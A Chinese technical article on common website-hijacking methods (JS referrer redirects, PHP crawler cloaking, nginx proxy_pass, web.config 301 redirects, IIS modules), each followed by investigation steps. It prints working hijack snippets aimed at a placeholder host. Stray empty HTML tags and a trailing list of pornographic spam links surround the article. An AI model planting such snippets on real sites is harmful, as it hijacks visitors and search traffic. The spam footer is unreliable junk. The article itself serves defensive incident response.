<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    2. 

    <del id="afajh"><form id="afajh"></form></del>
    

    5. 

        1. <th id="afajh"><progress id="afajh"></progress></th>

          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>
          常見網(wǎng)站劫持案例及解析
          共
                1748字,需瀏覽
                    4分鐘
                
           ·
          2021-03-30 08:28
          

                    
          攻擊者在入侵網(wǎng)站后,常常會(huì)通過惡意劫持流量來獲取收益,從而實(shí)現(xiàn)流量變現(xiàn)。有一些黑帽劫持的手法堪稱防不勝防,正常的訪問行為很難發(fā)現(xiàn)異常。今天給大家分享一下常見的網(wǎng)站劫持手法和排查思路。
          我們可以按照基于不同隱藏目的的常見劫持手法,來做一個(gè)簡(jiǎn)單的分類:
          1、將爬蟲與用戶正常訪問分開,實(shí)現(xiàn)搜索引擎快照劫持2、將移動(dòng)端與PC端的訪問分開,實(shí)現(xiàn)移動(dòng)端的流量劫持3、根據(jù)用戶訪問來源進(jìn)行判斷,實(shí)現(xiàn)特定來源網(wǎng)站劫持4、如果獲取管理員的真實(shí)IP地址,實(shí)現(xiàn)特定區(qū)域的流量劫持5、按照訪問路徑/關(guān)鍵詞/時(shí)間段設(shè)置,實(shí)現(xiàn)特定路徑/關(guān)鍵詞/時(shí)間段的流量劫持
          基于以上,實(shí)現(xiàn)的方式有很多種,比如客戶端js劫持、服務(wù)端代碼劫持、301重定向、惡意反向代理、IIS模塊劫持等。
          01、客戶端js劫持
          在網(wǎng)頁中插入js腳本,通過js進(jìn)行url跳轉(zhuǎn),一般情況下,會(huì)通過js混淆加密來增加識(shí)別難度。
          如下:通過js劫持從搜索引擎中來的流量。
          <script>var s=document.referrer; if(s.indexOf("baidu")>0||s.indexOf("soso")>0||s.indexOf("google")>0||s.indexOf("yahoo")>0||s.indexOf("sogou")>0||s.indexOf("youdao")>0||s.indexOf("bing")>0){self.location='http://www.xxxx.com'; }</script>
          排查思路:查看網(wǎng)頁源代碼或者抓包分析http流量,找到源代碼中插入的js代碼,刪除js代碼后恢復(fù)。
          02、服務(wù)端代碼劫持
          網(wǎng)站源碼被篡改,在首頁或配置文件中引入惡意代碼。
          如下:通過判斷User-agent與Referer,進(jìn)行快照劫持。
          <?phperror_reporting(0);//判斷是否為百度蜘蛛,然后進(jìn)行內(nèi)容劫持if(stripos($_SERVER["HTTP_USER_AGENT"],"baidu")>-1){$file?=?file_get_contents('http://www.xxxx.com');echo $file;exit;}//判斷是否來自百度搜索,然后進(jìn)行url跳轉(zhuǎn)if(stristr ($_SERVER['HTTP_REFERER'],"baidu.com")) {Header("Location:?http://www.xxxx.com/");//指定跳轉(zhuǎn)exit; }?>
          排查思路:查看網(wǎng)站首頁引入了哪些文件,依次訪問相關(guān)的文件源碼,確認(rèn)可疑的代碼,去除包含文件后恢復(fù)。備份網(wǎng)站源碼及文件完整性驗(yàn)證非常重要,可以幫助我們?cè)谏先f行的代碼中快速找到惡意代碼。
          03、nginx反向代理劫持
          以前遇到過一個(gè)網(wǎng)站做了網(wǎng)頁防篡改,無法通過修改網(wǎng)站源碼劫持,攻擊者通過修改nginx的配置文件,通過正則匹配url鏈接,配置proxy_pass代理轉(zhuǎn)發(fā)實(shí)現(xiàn)url劫持。
          location ~ /[0-9a-z]+sc {    proxy_pass  https://www.xxxx.com/;}
          排查思路:總結(jié)url劫持規(guī)律,中間件配置文件也是需要關(guān)注的位置。
          04、利用301重定向劫持
          通過HTTP重定向?qū)崿F(xiàn)301劫持。
           <httpRedirect enabled="true" destination="http://www.xxxx.com/1.php" childOnly="true" httpResponseStatus="Permanent" />
          排查思路:可以檢查網(wǎng)站根目錄下的配置文件web.config,確認(rèn)是否有相關(guān)設(shè)置。
          05、IIS惡意模塊劫持
          這種手法相對(duì)比較隱蔽,網(wǎng)站目錄中查不到webshell和掛馬頁面,但使用特定的路徑、Referer或者UA訪問,頁面會(huì)加載暗鏈。
          356bee1fa692261d7c766f34c66b94c8.webp
          排查思路:排查加載的異常dll文件,如沒有簽名、創(chuàng)建時(shí)間不匹配需重點(diǎn)關(guān)注??墒褂没鸾q劍或Process Monitor等工具協(xié)助排查。
          
                
          瀏覽
                    55
          點(diǎn)贊
    
          評(píng)論
    
          收藏
    
          分享
        
          手機(jī)掃一掃分享
          分享
    
          
        舉報(bào)
    
          評(píng)論
          圖片
          表情
          推薦
        
          點(diǎn)贊
    
          評(píng)論
    
          收藏
    
          分享
        
          手機(jī)掃一掃分享
          分享
    
          
        舉報(bào)
    
          

          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            2. 

            <del id="afajh"><form id="afajh"></form></del>
            

            5. 

                1. <th id="afajh"><progress id="afajh"></progress></th>

                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  

国产二区中文字幕
|
粗暴大黑鸡巴视频欧美
|
中国又粗又大性视频
|
亚洲AV综合伊人
|
伊人乱伦|